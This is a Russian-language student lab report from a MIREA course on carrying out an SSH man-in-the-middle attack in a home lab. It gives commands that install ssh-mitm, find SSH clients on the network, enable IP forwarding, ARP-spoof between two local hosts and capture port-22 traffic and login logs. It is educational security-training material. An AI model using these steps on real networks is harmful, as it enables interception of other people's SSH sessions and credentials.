# Практика 5 ###### tags: `MiSD`, `MIREA`, `OSINT` ## Цель работы Получение навыков по применению типа атаки Man-in-the-middle с использованием инструмента ssh-mitm. ## Выполнение работы Установка необходимых компонентов: ``` sudo apt install python3-netaddr python3-netifaces git clone https://github.com/jtesta/ssh-mitm cd ssh-mitm/ export LANG=en_US.utf-8 sudo ./install.sh ``` Результат установки на kali: ![](https://i.imgur.com/SkPKPJl.png) Пример выполнения команды скрипта [JoesAwesomeSSHMITMVictimFinder.py](http://joesawesomesshmitmvictimfinder.py/): ``` sudo python ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 -v ``` Захват всего трафика: ![](https://i.imgur.com/cIbfKiq.png) На изображении можно увидеть, что на машине злоумышленника (Kali слева) отображается количество переданных пакетов в сети. Собранный трафик: ![](https://i.imgur.com/64uiv0M.png) Как видно с серверной машины (192.168.31.228) поступали пакеты на kali. Получилось также найти адреса SSH агентов с помощью скрипта: ![](https://i.imgur.com/K71Sfo5.png) На картинке: 192.168.31.89 - Хост машина, Windows 11 192.168.31.111 - ВМ, Ubuntu ``` sudo apt-get install dsniff echo 1 > /proc/sys/net/ipv4/ip_forward sudo ./start.sh sudo arpspoof -r -t 192.168.31.89 192.168.31.113 sudo tcpdump dst port 22 ``` Получилось запустить ARP спуффинг. Результаты, а именно перехваченный трафик: ![](https://i.imgur.com/rAUXTrz.png) Сообщение о смене индентификации хоста: ![](https://i.imgur.com/wdpzt7F.png) Удаляю все записи из ~/.ssh/known_host для успешной авторизации снова. Можно получить логи авторизации из auth.log: ![](https://i.imgur.com/s5kdx7h.png) > Для правильной работы и отображения логов в auth.log необходимо было установить rsyslog. До установки использовал journalctl. ![](https://i.imgur.com/WDiqRzU.png)